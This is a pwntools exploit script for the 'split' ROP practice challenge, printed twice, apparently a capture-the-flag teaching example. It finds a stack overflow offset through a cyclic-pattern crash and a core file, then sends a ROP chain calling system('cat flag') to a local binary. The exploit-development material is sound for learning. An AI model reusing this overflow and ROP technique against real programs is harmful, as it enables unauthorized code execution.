zachriggle/win.py

## win.py
from pwn import *

# Set up pwntools to work with this binary
elf = context.binary = ELF('split')

# We need to invoke system("cat flag"), which requires knowing the
# location of both the function 'system' as well as the string 'cat flag'.
system = elf.symbols.system
cat_flag = elf.search("cat flag").next()

info("%#x system", system)
info("%#x cat flag", cat_flag)

# We need to ROP to call system().
#
# For 32-bit, we just need to set up the stack correctly.
# For 64-bit, we need to load the address of cat_flag into
# the register RDI.
#
# Luckily, pwntools knows all about this and handles it for us.
rop = ROP(elf)
rop.system(cat_flag)

info(rop.dump())

# Again, we will automatically discover the offset with a cyclic pattern.
#
#==============================================================================
#                        DISCOVER OFFSETS AUTOMATICALLY
#==============================================================================
# Figure out how big of an overflow we need by crashing the
# process once.
io = process(elf.path)

# We will send a 'cyclic' pattern which overwrites the return
# address on the stack.  The value 128 is longer than the buffer.
io.sendline(cyclic(128))

# Wait for the process to crash
io.wait()

# Open up the corefile
core = io.corefile

# Extract the faulting address, which should contain our cyclic pattern
fault = core.fault_addr
info("%r fault", fault)
#==============================================================================
#                               END OFFSET DISCOVERY
#==============================================================================

# Craft a new payload which puts the ROP stack at the correct offset
payload = fit({
    fault: str(rop)
})

# Send the payload to a new copy of the process
io = process(elf.path)
io.recvuntil("> ")
io.sendline(payload)

# Get our flag!
flag = io.recvline()
success(flag)
	from pwn import *

	# Set up pwntools to work with this binary
	elf = context.binary = ELF('split')

	# We need to invoke system("cat flag"), which requires knowing the
	# location of both the function 'system' as well as the string 'cat flag'.
	system = elf.symbols.system
	cat_flag = elf.search("cat flag").next()

	info("%#x system", system)
	info("%#x cat flag", cat_flag)

	# We need to ROP to call system().
	#
	# For 32-bit, we just need to set up the stack correctly.
	# For 64-bit, we need to load the address of cat_flag into
	# the register RDI.
	#
	# Luckily, pwntools knows all about this and handles it for us.
	rop = ROP(elf)
	rop.system(cat_flag)

	info(rop.dump())

	# Again, we will automatically discover the offset with a cyclic pattern.
	#
	#==============================================================================
	# DISCOVER OFFSETS AUTOMATICALLY
	#==============================================================================
	# Figure out how big of an overflow we need by crashing the
	# process once.
	io = process(elf.path)

	# We will send a 'cyclic' pattern which overwrites the return
	# address on the stack. The value 128 is longer than the buffer.
	io.sendline(cyclic(128))

	# Wait for the process to crash
	io.wait()

	# Open up the corefile
	core = io.corefile

	# Extract the faulting address, which should contain our cyclic pattern
	fault = core.fault_addr
	info("%r fault", fault)
	#==============================================================================
	# END OFFSET DISCOVERY
	#==============================================================================

	# Craft a new payload which puts the ROP stack at the correct offset
	payload = fit({
	fault: str(rop)
	})

	# Send the payload to a new copy of the process
	io = process(elf.path)
	io.recvuntil("> ")
	io.sendline(payload)

	# Get our flag!
	flag = io.recvline()
	success(flag)